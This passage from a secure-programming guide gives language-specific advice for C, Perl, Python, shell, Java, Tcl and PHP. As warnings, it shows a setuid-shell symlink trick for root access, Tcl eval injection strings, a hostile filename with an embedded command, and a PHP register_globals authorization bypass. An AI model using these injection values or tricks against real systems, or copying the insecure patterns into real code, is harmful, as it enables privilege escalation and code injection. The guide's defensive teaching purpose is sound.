You might want ``-W -pedantic'' too.
Many C/C++ compilers can detect inaccurate format strings. For example, gcc
can warn about inaccurate format strings for functions you create if you use
its __attribute__() facility (a C extension) to mark such functions, and you
can use that facility without making your code non-portable. Here is an
example of what you'd put in your header (.h) file:
/* in header.h */
#ifndef __GNUC__
# define __attribute__(x) /*nothing*/
#endif
extern void logprintf(const char *format, ...)
__attribute__((format(printf,1,2)));
extern void logprintva(const char *format, va_list args)
__attribute__((format(printf,1,0)));
The "format" attribute takes either "printf" or "scanf", and the numbers that
follow are the parameter number of the format string and the first variadic
parameter (respectively). The GNU docs discuss this facility in detail.
Note that there
are other __attribute__ facilities as well, such as "noreturn" and "const".
Avoid common errors made by C/C++ developers. For example, be careful about
not using ``='' when you mean ``==''.
-----------------------------------------------------------------------------
10.2. Perl
Perl programmers should first read the man page perlsec(1), which describes a
number of issues involved with writing secure programs in Perl. In
particular, perlsec(1) describes the ``taint'' mode, which most secure Perl
programs should use. Taint mode is automatically enabled if the real and
effective user or group IDs differ, or you can use the -T command line flag
(use the latter if you're running on behalf of someone else, e.g., a CGI
script). Taint mode turns on various checks, such as checking path
directories to make sure they aren't writable by others.
The most obvious effect of taint mode, however, is that you may not use data
derived from outside your program to affect something else outside your
program by accident. In taint mode, all externally-obtained input is marked
as ``tainted'', including command line arguments, environment variables,
locale information (see perllocale(1)), results of certain system calls
(readdir, readlink, the gecos field of getpw* calls), and all file input.
Tainted data may not be used directly or indirectly in any command that
invokes a sub-shell, nor in any command that modifies files, directories, or
processes. There is one important exception: If you pass a list of arguments
to either system or exec, the elements of that list are NOT checked for
taintedness, so be especially careful with system or exec while in taint
mode.
Any data value derived from tainted data also becomes tainted. There is one
exception: you can untaint data by extracting a substring (via a regular
expression match) from the tainted data. Don't just match ``.*'' blindly,
though, since this would defeat the tainting mechanism's protections.
Instead, write a pattern that matches only the ``safe'' values allowed by
your program, and use it to extract ``good'' values. After extracting a
value, you may still need to check it (in particular, its length).
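This whitelist-extraction idiom carries over to other languages too. As an illustration only (not Perl's taint mechanism itself), here is roughly the same idea sketched in Python; the pattern, length limit, and function name are assumptions you would tailor to your own program:

```python
import re

# Hypothetical validator: accept only values matching a known-safe
# ("whitelist") pattern, mirroring Perl's untaint-by-substring idiom.
SAFE_NAME = re.compile(r"[A-Za-z0-9_]{1,32}\Z")

def untaint_name(value):
    """Return the value only if it is entirely safe; reject otherwise."""
    if SAFE_NAME.match(value) is None:
        raise ValueError("unsafe input rejected: %r" % value)
    return value
```

The key point is the same in either language: match against the pattern of values you allow, never a catch-all like ``.*''.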
The open, glob, and backtick functions call the shell to expand filename wild
card characters; this can be used to open security holes. You can try to
avoid these functions entirely, or use them in a less-privileged ``sandbox''
as described in perlsec(1). In particular, backticks should be rewritten
using the system() call (or even better, changed entirely to something
safer).
The perl open() function comes with, frankly, ``way too much magic'' for most
secure programs; it interprets text that, if not carefully filtered, can
create lots of security problems. Before writing code to open or lock a file,
consult the perlopentut(1) man page. In most cases, sysopen() provides a
safer (though more convoluted) approach to opening a file. The new Perl 5.6
adds an open() call with 3 parameters to turn off the magic behavior without
requiring the convolutions of sysopen().
Perl programs should turn on the warning flag (-w), which warns of
potentially dangerous or obsolete statements.
You can also run Perl programs in a restricted environment. For more
information see the ``Safe'' module in the standard Perl distribution. I'm
uncertain of the amount of auditing that this has undergone, so beware of
depending on this for security. You might also investigate the ``Penguin
Model for Secure Distributed Internet Scripting'', though at the time of this
writing the code and documentation seems to be unavailable.
Many installations include a setuid root version of perl named ``suidperl''.
However, the perldelta man page for version 5.6.1 recommends using sudo instead,
stating the following:
"Note that suidperl is neither built nor installed by default in any
recent version of perl. Use of suidperl is highly discouraged. If you
think you need it, try alternatives such as sudo first. See http://
www.courtesan.com/sudo/".
-----------------------------------------------------------------------------
10.3. Python
As with any language, beware of any functions that allow data to be executed
as part of a program, and make sure an untrusted user can't control their
input. These include exec(), eval(), and execfile() (and frankly, you should
carefully check any call to compile()). The input() statement is also
surprisingly dangerous [Watters 1996, 150].
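When the goal is merely to parse a data value (rather than run code), modern Python versions (2.6 and later) offer ast.literal_eval() as a much safer substitute for eval(): it accepts only Python literals and raises an exception on anything else. A small sketch:

```python
import ast

# ast.literal_eval() parses only literals (numbers, strings, tuples,
# lists, dicts, sets, booleans, None) -- it will not call functions,
# import modules, or execute statements.
value = ast.literal_eval("{'port': 8080, 'hosts': ['a', 'b']}")

try:
    ast.literal_eval("__import__('os').system('id')")   # a function call
except ValueError:
    pass   # rejected instead of executed
```

This turns the dangerous ``evaluate whatever the user sent'' operation into a strict parse of a small, well-defined input grammar.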
Python programs with privileges that can be invoked by unprivileged users
(e.g., setuid/setgid programs) must not import the ``user'' module. The user
module causes the pythonrc.py file to be read and executed. Since this file
would be under the control of an untrusted user, importing the user module
allows an attacker to force the trusted program to run arbitrary code.
Python does very little compile-time checking -- it has essentially no
compile-time type information, and it doesn't even check that the number of
parameters passed are legal for a given function or method. This is
unfortunate, resulting in a lot of latent bugs (both John Viega and I have
experienced this problem). Hopefully someday Python will implement optional
static typing and type-checking, an idea that's been discussed for some time.
A partial solution for now is PyChecker, a lint-like program that checks for
common bugs in Python source code. You can get PyChecker from [http://
pychecker.sourceforge.net] http://pychecker.sourceforge.net
Python includes support for ``Restricted Execution'' through its RExec class.
This is primarily intended for executing applets and mobile code, but it can
also be used to limit privilege in a program even when the code has not been
provided externally. By default, a restricted execution environment permits
reading (but not writing) of files, and does not include operations for
network access or GUI interaction. These defaults can be changed, but beware
of creating loopholes in the restricted environment. In particular, allowing
a user to unrestrictedly add attributes to a class permits all sorts of ways
to subvert the environment because Python's implementation calls many
``hidden'' methods. Note that, by default, most Python objects are passed by
reference; if you insert a reference to a mutable value into a restricted
program's environment, the restricted program can change the object in a way
that's visible outside the restricted environment! Thus, if you want to give
access to a mutable value, in many cases you should copy the mutable value or
use the Bastion module (which supports restricted access to another object).
For more information, see Kuchling [2000]. I'm uncertain of the amount of
auditing that the restricted execution capability has undergone, so
programmer beware.
-----------------------------------------------------------------------------
10.4. Shell Scripting Languages (sh and csh Derivatives)
I strongly recommend against using standard command shell scripting languages
(such as csh, sh, and bash) for setuid/setgid secure code. Some systems (such
as Linux) completely disable setuid/setgid shell scripts, so creating setuid/
setgid shell scripts introduces an unnecessary portability problem. On some old
systems they are fundamentally insecure due to a race condition (as discussed
in Section 3.1.3). Even for other systems, they're not really a good idea.
In fact, there are a vast number of circumstances where shell scripting
languages shouldn't be used at all for secure programs. Standard command
shells are notorious for being affected by nonobvious inputs - generally
because command shells were designed to try to do things ``automatically''
for an interactive user, not to defend against a determined attacker. Shell
programs are fine for programs that don't need to be secure (e.g., they run
at the same privilege as the unprivileged user and don't accept ``untrusted''
data). They can also be useful when they're running with privilege, as long
as all the input (e.g., files, directories, command line, environment, etc.)
comes from trusted users - which is why they're often used quite
successfully in startup/shutdown scripts.
Writing secure shell programs in the presence of malicious input is harder
than in many other languages because of all the things that shells are
affected by. For example, ``hidden'' environment variables (e.g., the ENV,
BASH_ENV, and IFS values) can affect how they operate or even execute
arbitrary user-defined code before the script can even execute. Even things
like filenames of the executable or directory contents can affect execution.
If an attacker can create filenames containing some control characters (e.g.,
newline), or whitespace, or shell metacharacters, or begin with a dash (the
option flag syntax), there are often ways to exploit them. For example, on
many Bourne shell implementations, doing the following will grant root access
(thanks to NCSA for describing this exploit):
% ln -s /usr/bin/setuid-shell /tmp/-x
% cd /tmp
% -x
Some systems may have closed this hole, but the point still stands: most
command shells aren't intended for writing secure setuid/setgid programs. For
programming purposes, avoid creating setuid shell scripts, even on those
systems that permit them. Instead, write a small program in another language
to clean up the environment, then have it call other executables (some of
which might be shell scripts).
If you still insist on using shell scripting languages, at least put the
script in a directory where it cannot be moved or changed. Set PATH and IFS
to known values very early in your script; indeed, the environment should be
cleaned before the script is called. Also, very early on, ``cd'' to a safe
directory. Use data only from directories that are controlled by trusted
users, e.g., /etc, so that attackers can't insert maliciously-named files
into those directories. Be sure to quote every filename passed on a command
line, e.g., use "$1" not $1, because filenames with whitespace will be split.
Call commands using "--" to disable additional options where you can, because
attackers may create or pass filenames beginning with dash in the hope of
tricking the program into processing it as an option. Be especially careful
of filenames embedding other characters (e.g., newlines and other control
characters). Examine input filenames especially carefully and be very
restrictive on what filenames are permitted.
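The same rule - pass an argument vector, not a shell-parsed string - applies whenever another language invokes external commands. As an illustrative sketch in Python (the hostile filename is made up):

```python
import subprocess

hostile = "-x; echo pwned"   # a made-up attacker-chosen filename

# Dangerous: shell=True would let the shell reinterpret metacharacters:
#   subprocess.run("ls -l " + hostile, shell=True)

# Safer: no shell is involved, each argument is passed literally, and
# "--" stops option processing so the leading dash isn't read as an option.
result = subprocess.run(["ls", "-l", "--", hostile],
                        capture_output=True, text=True)
# ls merely fails to find a file with that odd name; nothing is executed.
```

Because the kernel receives the argument list directly, the semicolon, space, and leading dash in the filename never acquire any special meaning.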
If you don't mind limiting your program to only work with GNU tools (or if
you detect and optionally use the GNU tools instead when they are available),
you might want to use NIL characters as the filename terminator instead of
newlines. By using NIL characters, rather than whitespace or newlines,
handling nasty filenames (e.g., those with embedded newlines) is much
simpler. Several GNU tools that output or input filenames can use this format
instead of the more common ``one filename per line'' format. Unfortunately,
the name of this option isn't consistent between tools; for many tools the
name of this option is ``--null'' or ``-0''. GNU programs xargs and cpio
allow using either --null or -0, tar uses --null, find uses -print0, grep
uses either --null or -Z, and sort uses either -z or --zero-terminated. Those
who find this inconsistency particularly disturbing are invited to supply
patches to the GNU authors; I would suggest making sure every program
supported ``--null'' since that seems to be the most common option name. For
example, here's one way to move files to a target directory, even if there
may be a vast number of files and some may have awkward names with embedded
newlines (thanks to Jim Dennis for reminding me of this):
find . -print0 | xargs --null mv --target-directory="$TARG"
In a similar vein, I recommend not trusting ``restricted shells'' to
implement secure policies. Restricted shells are shells that intentionally
prevent users from performing a large set of activities - their goal is to
force users to only run a small set of programs. A restricted shell can be
useful as a defense-in-depth measure, but restricted shells are notoriously
hard to configure correctly and, as configured, are often subvertible. For
example, some restricted shells will start by running some file in an
unrestricted mode (e.g., ``.profile'') - if a user can change this file, they
can force execution of that code. A restricted shell should be set up to only
run a few programs, but if any of those programs have ``shell escapes'' to
let users run more programs, attackers can use those shell escapes to escape
the restricted shell. Even if the programs don't have shell escapes, it's
quite likely that the various programs can be used together (along with the
shell's capabilities) to escape the restrictions. Of course, if you don't set
the PATH of a restricted shell (and allow any program to run), then an
attacker can use the shell escapes of many programs (including text editors,
mailers, etc.). The problem is that the purpose of a shell is to run other
programs, but those other programs may allow unintended operations -- and the
shell doesn't interpose itself to prevent these operations.
-----------------------------------------------------------------------------
10.5. Ada
In Ada95, the Unbounded_String type is often more flexible than the String
type because it is automatically resized as necessary. However, don't store
especially sensitive secret values such as passwords or secret keys in an
Unbounded_String, since core dumps and page areas might still hold them
later. Instead, use the String type for this data, lock it into memory while
it's used, and overwrite the data as soon as possible with some constant
value such as (others => ' '). Use the Ada pragma Inspection_Point on the
object holding the secret after erasing the memory. That way, you can be
certain that the object containing the secret will really be erased (and that
the overwriting won't be optimized away).
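The underlying idea - keep secrets in a buffer you can overwrite, and erase it as soon as possible - applies in other languages as well. A minimal Python sketch (Python offers no equivalent of memory locking or Inspection_Point here, so this only illustrates the overwrite step; a mutable bytearray is used because immutable strings cannot be erased in place):

```python
secret = bytearray(b"hunter2")      # illustrative secret value
try:
    pass  # ... use the secret while it is needed ...
finally:
    # Overwrite every byte with a constant value as soon as possible,
    # even if an exception occurred while the secret was in use.
    for i in range(len(secret)):
        secret[i] = 0
```

The try/finally form mirrors the Ada advice: erasure happens on every exit path, not just the successful one.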
It's common for beginning Ada programmers to believe that the String type's
first index value is always 1, but this isn't true if the string is sliced.
Avoid this error.
It's worth noting that SPARK is a ``high-integrity subset of the Ada
programming language''; SPARK users use a tool called the ``SPARK Examiner''
to check conformance to SPARK rules, including flow analysis, and there is
various support for full formal proof of the code if desired. See the SPARK
website for more information. To my knowledge, there are no OSS/FS SPARK
tools. If you're storing passwords and private keys you should still lock
them into memory if appropriate and overwrite them as soon as possible. Note
that SPARK is often used in environments where paging does not occur.
-----------------------------------------------------------------------------
10.6. Java
If you're developing secure programs using Java, frankly your first step
(after learning Java) is to read the two primary texts for Java security,
namely Gong [1999] and McGraw [1999] (for the latter, look particularly at
section 7.1). You should also look at Sun's posted security code guidelines
at [http://java.sun.com/security/seccodeguide.html] http://java.sun.com/
security/seccodeguide.html, and there's a nice [http://www-106.ibm.com/
developerworks/java/library/j-staticsec.html?loc=dwmain] article by Sahu et
al. [2002]. A set of slides describing Java's security model is freely
available at [http://www.dwheeler.com/javasec] http://www.dwheeler.com/
javasec. You can also see McGraw [1998].
Obviously, a great deal depends on the kind of application you're developing.
Java code intended for use on the client side has a completely different
environment (and trust model) than code on a server side. The general
principles apply, of course; for example, you must check and filter any input
from an untrusted source. However, in Java there are some ``hidden'' inputs
or potential inputs that you need to be wary of, as discussed below.
Johnathan Nightingale [2000] made an interesting statement summarizing many
of the issues in Java programming:
... the big thing with Java programming is minding your inheritances. If
you inherit methods from parents, interfaces, or parents' interfaces, you
risk opening doors to your code.
The following are a few key guidelines, based on Gong [1999], McGraw [1999],
Sun's guidance, and my own experience:
1. Do not use public fields or variables; declare them as private and
provide accessors to them so you can limit their accessibility.
2. Make methods private unless there is a good reason to do otherwise (and
if you do otherwise, document why). These non-private methods must
protect themselves, because they may receive tainted data (unless you've
somehow arranged to protect them).
3. The JVM may not actually enforce the accessibility modifiers (e.g.,
``private'') at run-time in an application (as opposed to an applet). My
thanks to John Steven (Cigital Inc.), who pointed this out on the
``Secure Programming'' mailing list on November 7, 2000. The issue is
that it all depends on what class loader the class requesting the access
was loaded with. If the class was loaded with a trusted class loader
(including the null/ primordial class loader), the access check returns
"TRUE" (allowing access). For example, this works (at least with Sun's
1.2.2 VM; it might not work with other implementations):
a. write a victim class (V) with a public field, compile it.
b. write an 'attack' class (A) that accesses that field, compile it
c. change V's public field to private, recompile
d. run A - it'll access V's (now private) field.
However, the situation is different with applets. If you convert A to an
applet and run it as an applet (e.g., with appletviewer or browser), its
class loader is no longer a trusted (or null) class loader. Thus, the
code will throw java.lang.IllegalAccessError, with the message that
you're trying to access a field V.secret from class A.
4. Avoid using static field variables. Such variables are attached to the
class (not class instances), and classes can be located by any other
class. As a result, static field variables can be found by any other
class, making them much more difficult to secure.
5. Never return a mutable object to potentially malicious code (since the
code may decide to change it). Note that arrays are mutable (even if the
array contents aren't), so don't return a reference to an internal array
with sensitive data.
6. Never store user-given mutable objects (including arrays of objects)
directly. Otherwise, the user could hand the object to the secure code,
let the secure code ``check'' the object, and change the data while the
secure code was trying to use the data. Clone arrays before saving them
internally, and be careful here (e.g., beware of user-written cloning
routines).
7. Don't depend on initialization. There are several ways to allocate
uninitialized objects.
8. Make everything final, unless there's a good reason not to. If a class or
method is non-final, an attacker could try to extend it in a dangerous
and unforeseen way. Note that this causes a loss of extensibility, in
exchange for security.
9. Don't depend on package scope for security. A few classes, such as
java.lang, are closed by default, and some Java Virtual Machines (JVMs)
let you close off other packages. Otherwise, Java classes are not closed.
Thus, an attacker could introduce a new class inside your package, and
use this new class to access the things you thought you were protecting.
10. Don't use inner classes. When inner classes are translated into byte
codes, the inner class is translated into a class accessible to any class
in the package. Even worse, the enclosing class's private fields silently
become non-private to permit access by the inner class!
11. Minimize privileges. Where possible, don't require any special
permissions at all. McGraw goes further and recommends not signing any
code; I say go ahead and sign the code (so users can decide to ``run only
signed code by this list of senders''), but try to write the program so
that it needs nothing more than the sandbox set of privileges. If you
must have more privileges, audit that code especially hard.
12. If you must sign your code, put it all in one archive file. Here it's
best to quote McGraw [1999]:
The goal of this rule is to prevent an attacker from carrying out a
mix-and-match attack in which the attacker constructs a new applet or
library that links some of your signed classes together with
malicious classes, or links together signed classes that you never
meant to be used together. By signing a group of classes together,
you make this attack more difficult. Existing code-signing systems do
an inadequate job of preventing mix-and-match attacks, so this rule
cannot prevent such attacks completely. But using a single archive
can't hurt.
13. Make your classes uncloneable. Java's object-cloning mechanism allows an
attacker to instantiate a class without running any of its constructors.
To make your class uncloneable, just define the following method in each
of your classes:
public final Object clone() throws java.lang.CloneNotSupportedException {
throw new java.lang.CloneNotSupportedException();
}
If you really need to make your class cloneable, then there are some
protective measures you can take to prevent attackers from redefining
your clone method. If you're defining your own clone method, just make it
final. If you're not, you can at least prevent the clone method from
being maliciously overridden by adding the following:
public final Object clone() throws java.lang.CloneNotSupportedException {
return super.clone();
}
14. Make your classes unserializable. Serialization allows attackers to view
the internal state of your objects, even private portions. To prevent
this, add this method to your classes:
private final void writeObject(ObjectOutputStream out)
throws java.io.IOException {
throw new java.io.IOException("Object cannot be serialized");
}
Even in cases where serialization is okay, be sure to use the transient
keyword for the fields that contain direct handles to system resources
and that contain information relative to an address space. Otherwise,
deserializing the class may permit improper access. You may also want to
identify sensitive information as transient.
If you define your own serializing method for a class, it should not pass
an internal array to any DataInput/DataOuput method that takes an array.
The rationale: All DataInput/DataOutput methods can be overridden. If a
Serializable class passes a private array directly to a DataOutput(write
(byte [] b)) method, then an attacker could subclass ObjectOutputStream
and override the write(byte [] b) method to enable him to access and
modify the private array. Note that the default serialization does not
expose private byte array fields to DataInput/DataOutput byte array
methods.
15. Make your classes undeserializable. Even if your class is not
serializable, it may still be deserializable. An attacker can create a
sequence of bytes that happens to deserialize to an instance of your
class with values of the attacker's choosing. In other words,
deserialization is a kind of public constructor, allowing an attacker to
choose the object's state - clearly a dangerous operation! To prevent
this, add this method to your classes:
private final void readObject(ObjectInputStream in)
throws java.io.IOException {
throw new java.io.IOException("Class cannot be deserialized");
}
16. Don't compare classes by name. After all, attackers can define classes
with identical names, and if you're not careful you can cause confusion
by granting these classes undesirable privileges. Thus, here's an example
of the wrong way to determine if an object has a given class:
if (obj.getClass().getName().equals("Foo")) {
If you need to determine if two objects have exactly the same class,
instead use getClass() on both sides and compare using the == operator.
Thus, you should use this form:
if (a.getClass() == b.getClass()) {
If you truly need to determine if an object has a given classname, you
need to be pedantic and be sure to use the current namespace (of the
current class's ClassLoader). Thus, you'll need to use this format:
if (obj.getClass() == this.getClassLoader().loadClass("Foo")) {
This guideline is from McGraw and Felten, and it's a good guideline. I'll
add that, where possible, it's often a good idea to avoid comparing class
values anyway. It's often better to try to design class methods and
interfaces so you don't need to do this at all. However, this isn't
always practical, so it's important to know these tricks.
17. Don't store secrets (cryptographic keys, passwords, or algorithms) in the
code or data. Hostile JVMs can quickly view this data. Code obfuscation
doesn't really hide the code from serious attackers.
-----------------------------------------------------------------------------
10.7. Tcl
Tcl stands for ``tool command language'' and is pronounced ``tickle.'' Tcl is
divided into two parts: a language and a library. The language is a simple
language, originally intended for issuing commands to interactive programs
and including basic programming capabilities. The library can be embedded in
application programs. You can find more information about Tcl at sites such
as [http://www.tcl.tk/] Tcl.tk, the [http://www.sco.com/Technology/tcl
/Tcl.html] Tcl WWW Info web page, and the comp.lang.tcl FAQ launch page at
[http://www.tclfaq.wservice.com/tcl-faq] http://www.tclfaq.wservice.com/
tcl-faq. My thanks go to Wojciech Kocjan for providing some of this detailed
information on using Tcl in secure applications.
For some security applications, especially interesting components of Tcl are
Safe-Tcl (which creates a sandbox in Tcl) and Safe-TK (which implements a
sandboxed portable GUI for Safe Tcl), as well as the WebWiseTclTk Toolkit
which permits Tcl packages to be automatically located and loaded from
anywhere on the World Wide Web. You can find more about the latter from
[http://www.cbl.ncsu.edu/software/WebWiseTclTk] http://www.cbl.ncsu.edu/
software/WebWiseTclTk. It's not clear to me how much code review this has
received.
Tcl's original design goal to be a small, simple language resulted in a
language that was originally somewhat limiting and slow. For an example of
the limiting weaknesses in the original language, see [http://sdg.lcs.mit.edu
/~jchapin/6853-FT97/Papers/stallman-tcl.html] Richard Stallman's ``Why You
Should Not Use Tcl''. For example, Tcl was originally designed to really
support only one data type (string). Thankfully, these issues have been
addressed over time. In particular, version 8.0 added support for more data
types (integers are stored internally as integers, lists as lists and so on).
This improves its capabilities, and in particular improves its speed.
As with essentially all scripting languages, Tcl has an "eval" command that
parses and executes arbitrary Tcl commands. And like all such scripting
languages, this eval command needs to be used especially carefully, or an
attacker could insert characters in the input to cause malicious things to
occur. For example, an attacker may be able to insert characters with special
meaning to Tcl such as embedded whitespace (including space and newline),
double-quote, curly braces, square brackets, dollar signs, backslash,
semicolon, or pound sign (or create input to cause these characters to be
created during processing). This also applies to any function that passes
data to eval (depending on how eval is called).
Here is a small example that may make this concept clearer; first, let's
define a small function and then interactively invoke it directly - note that
these uses are fine:
proc something {a b c d e} {
puts "A='$a'"
puts "B='$b'"
puts "C='$c'"
puts "D='$d'"
puts "E='$e'"
}
% # This works normally:
% something "test 1" "test2" "t3" "t4" "t5"
A='test 1'
B='test2'
C='t3'
D='t4'
E='t5'
% # Imagine that str1 is set by an attacker:
% set str1 {test 1 [puts HELLOWORLD]}
% # This works as well
% something $str1 t2 t3 t4 t5
A='test 1 [puts HELLOWORLD]'
B='t2'
C='t3'
D='t4'
E='t5'
However, continuing the example, let's see how "eval" can be incorrectly and
correctly called. If you call eval in an incorrect (dangerous) way, it allows
attackers to misuse it. However, by using commands like list or lrange to
correctly group the input, you can avoid this problem:
% # This is the WRONG way - str1 is interpreted.
% eval something $str1 t2 t3
HELLOWORLD
A='test'
B='1'
C=''
D='t2'
E='t3'
% # Here's one solution, using "list".
% eval something [list $str1 t2 t3 t4 t5]
A='test 1 [puts HELLOWORLD]'
B='t2'
C='t3'
D='t4'
E='t5'
% # Here's another solution, using lrange:
% eval something [lrange $str1 0 end] t2
A='test'
B='1'
C='[puts'
D='HELLOWORLD]'
E='t2'
Using lrange is useful when concatenating arguments to a called function,
e.g., with more complex libraries using callbacks. In Tcl, eval is often used
to create a one-argument version of a function that takes a variable number
of arguments, and you need to be careful when using it this way. Here's
another example (presuming that you've defined a "printf" function):
proc vprintf {str arglist} {
eval printf [list $str] [lrange $arglist 0 end]
}
% printf "1+1=%d 2+2=%d" 2 4
% vprintf "1+1=%d 2+2=%d" {2 4}
Fundamentally, when passing a command that will be eventually evaluated, you
must pass Tcl commands as a properly built list, and not as a (possibly
concatenated) string. For example, the "after" command runs a Tcl command
after a given number of milliseconds; if the data in $param1 can be
controlled by an attacker, this Tcl code is dangerously wrong:
# DON'T DO THIS if param1 can be controlled by an attacker
after 1000 "someCommand someparam $param1"
This is wrong, because if an attacker can control the value of $param1, the
attacker can control the program. For example, if the attacker can cause
$param1 to have '[exit]', then the program will exit. Likewise, if $param1
were '; exit', the program would also exit.
Thus, the proper alternative would be:
after 1000 [list someCommand someparam $param1]
Even better would be something like the following:
set cmd [list someCommand someparam]
after 1000 [concat $cmd $param1]
Here's another example showing what you shouldn't do, pretending that $params
is data controlled by a possibly malicious user:
set params "%-20s TESTSTRING"
puts "'[eval format $params]'"
will result in:
'TESTSTRING '
But if the untrusted user sends data with an embedded newline, like
this:
set params "%-20s TESTSTRING\nputs HELLOWORLD"
puts "'[eval format $params]'"
The result will be this (notice that the attacker's code was executed!):
HELLOWORLD
'TESTSTRING          '
Wojciech Kocjan suggests that the simplest solution in this case is to
convert this to a list using lrange, doing this:
set params "%-20s TESTSTRING\nputs HELLOWORLD"
puts "'[eval format [lrange $params 0 end]]'"
The result would be:
'TESTSTRING          '
Note that this solution presumes that the potentially malicious text is
concatenated to the end of the text; as with all languages, make sure the
attacker cannot control the format text.
As a matter of style, always use curly braces when using if, while, for, expr,
and any other command that parses an argument using expr/eval/subst. Doing
this will avoid a common Tcl error known as unintended double substitution.
This is best explained by example; the following code is incorrect:
while ![eof $file] {
set line [gets $file]
}
The code is incorrect because the "![eof $file]" text will be evaluated by
the Tcl parser when the while command is executed the first time, and not
re-evaluated in every iteration as it should be. Instead, do this:
while {![eof $file]} {
set line [gets $file]
}
Note that both the condition, and the action to be performed, are surrounded
by curly braces. Although there are cases where the braces are redundant,
they never hurt, and when you fail to include the curly braces where they're
needed (say, when making a minor change) subtle and hard-to-find errors often
result.
More information on good Tcl style can be found in documents such as [http://
www.tcl.tk/doc/styleGuide.pdf] Ray Johnson's Tcl Style Guide.
In the past, I have stated that I don't recommend Tcl for writing programs
which must mediate a security boundary. Tcl seems to have improved since that
time, so while I cannot guarantee Tcl will work for your needs, I can't
guarantee that any other language will work for you either. Again, my thanks
to Wojciech Kocjan who provided some of these suggestions on how to write Tcl
code for secure applications.
-----------------------------------------------------------------------------
10.8. PHP
SecureReality has put out a very interesting paper titled ``A Study In
Scarlet - Exploiting Common Vulnerabilities in PHP'' [Clowes 2001], which
discusses some of the problems in writing secure programs in PHP,
particularly in versions before PHP 4.1.0. Clowes concludes that ``it is very
hard to write a secure PHP application (in the default configuration of PHP),
even if you try''.
Granted, there are security issues in any language, but one particular issue
stands out in older versions of PHP that arguably makes older PHP versions
less secure than most languages: the way it loads data into its namespace. By
default, in PHP (versions 4.1.0 and lower) all environment variables and
values sent to PHP over the web are automatically loaded into the same
namespace (global variables) that normal variables are loaded into - so
attackers can set arbitrary variables to arbitrary values, which keep their
values unless explicitly reset by a PHP program. In addition, PHP
automatically creates variables with a default value when they're first
requested, so it's common for PHP programs to not initialize variables. If
you forget to set a variable, PHP can report it, but by default PHP won't -
and note that this is simply an error report; it won't stop an attacker who
finds an unusual way to trigger it. Thus, by default PHP allows an attacker to
completely control the values of all variables in a program unless the
program takes special care to override the attacker. Once the program takes
over, it can reset these variables, but failing to reset any variable (even
one not obvious) might open a vulnerability in the PHP program.
For example, the following PHP program (an example from Clowes) intends to
reveal some important information only to those who know the password, but an
attacker can set ``auth'' in their web browser request and subvert the
authorization check:
<?php
if ($pass == "hello")
    $auth = 1;
...
if ($auth == 1)
    echo "some important information";
?>
I and many others have complained about this particularly dangerous problem;
it's especially a problem because PHP is widely used. After all, a language
that's supposed to be easy to use should make it easy to write secure
programs. It's possible to disable this misfeature in PHP by turning the
setting ``register_globals'' to ``off'', but PHP versions up through 4.1.0
set it to ``on'' by default, and PHP before 4.1.0 is harder to use with
register_globals off. The PHP developers warned in their PHP 4.1.0
announcement that ``as of the next semi-major version of PHP, new
installations of PHP will default to having register_globals set to off.''
This has now happened; as of PHP version 4.2.0, external variables (from the
environment, the HTTP request, cookies or the web server) are no longer
registered in the global scope by default. The preferred method of accessing
these external variables is by using the new Superglobal arrays, introduced
in PHP 4.1.0.
PHP with ``register_globals'' set to ``on'' is a dangerous choice for
nontrivial programs - it's just too easy to write insecure programs. However,
once ``register_globals'' is set to ``off'', PHP is quite a reasonable
language for development.
The secure default should include setting ``register_globals'' to ``off'',
and also including several functions to make it much easier for users to
specify and limit the input they'll accept from external sources. Then web
servers (such as Apache) could separately configure this secure PHP
installation. Routines could be placed in the PHP library to make it easy for
users to list the input variables they want to accept; some functions could
check the patterns these variables must have and/or the type that the
variable must be coerced to. In my opinion, PHP is a bad choice for secure
web development if you set register_globals on.
As I suggested in earlier versions of this book, PHP has been trivially
modified to become a reasonable choice for secure web development. However,
note that PHP doesn't have a particularly good security vulnerability track
record (e.g., register_globals, a file upload problem, and a format string
problem in the error reporting library); I believe that security issues were
not considered sufficiently in early editions of PHP; I also think that the
PHP developers are now emphasizing security and that these security issues
are finally getting worked out. One piece of evidence is the major change the
PHP developers made to turn register_globals off by default; this had a significant
impact on PHP users, and their willingness to make this change is a good
sign. Unfortunately, it's not yet clear how secure PHP really is; PHP just
hasn't had much of a track record now that the developers of PHP are
examining it seriously for security issues. Hopefully this will become clear
quickly.
If you've decided to use PHP, here are some of my recommendations (many of
these recommendations are based on ways to counter the issues that Clowes
raises):
  * Set the PHP configuration option ``register_globals'' off, and use PHP
4.2.0 or greater. PHP 4.1.0 adds several special arrays, particularly
$_REQUEST, which makes it far simpler to develop software in PHP when
``register_globals'' is off. Setting register_globals off, which is the
default in PHP 4.2.0, completely eliminates the most common PHP attacks.
If you're assuming that register_globals is off, you should check for
this first (and halt if it's not true) - that way, people who install
your program will quickly know there's a problem. Note that many
third-party PHP applications cannot work with this setting, so it can be
difficult to keep it off for an entire website. It's possible to set
register_globals off for only some programs. For example, for Apache, you
could insert these lines into the file .htaccess in the PHP directory (or
use Directory directives to control it further):
php_flag register_globals Off
php_flag track_vars On
However, the .htaccess file itself is ignored unless the Apache web
server is configured to permit overrides; often the Apache global
configuration is set so that AllowOverride is set to None. So, for Apache
users, if you can convince your web hosting service to set
``AllowOverride Options'' in their configuration file (often /etc/httpd/
conf/httpd.conf) for your host, do that. Then write helper functions to
simplify loading the data you need (and only that data).
  * If you must develop software where register_globals might be on while
running (e.g., a widely-deployed PHP application), always set values not
provided by the user. Don't depend on PHP default values, and don't trust
any variable you haven't explicitly set. Note that you have to do this
for every entry point (e.g., every PHP program or HTML file using PHP).
The best approach is to begin each PHP program by setting all variables
you'll be using, even if you're simply resetting them to the usual
default values (like "" or 0). This includes global variables referenced
in included files, even all libraries, transitively. Unfortunately, this
makes this recommendation hard to do, because few developers truly know
and understand all global variables that may be used by all functions
they call. One lesser alternative is to search through HTTP_GET_VARS,
HTTP_POST_VARS, HTTP_COOKIE_VARS, and HTTP_POST_FILES to see if the user
provided the data - but programmers often forget to check all sources,
and what happens if PHP adds a new data source (e.g., HTTP_POST_FILES
wasn't in old versions of PHP). Of course, this simply tells you how to
make the best of a bad situation; in case you haven't noticed yet, turn
off register_globals!
  * Set the error reporting level to E_ALL, and resolve all errors reported
by it during testing. Among other things, this will complain about
un-initialized variables, which are a key issue in PHP. This is a good
idea anyway whenever you start using PHP, because this helps debug
programs, too. There are many ways to set the error reporting level,
including in the ``php.ini'' file (global), the ``httpd.conf'' file
(single-host), the ``.htaccess'' file (multi-host), or at the top of the
script through the error_reporting function. I recommend setting the
error reporting level in both the php.ini file and also at the top of the
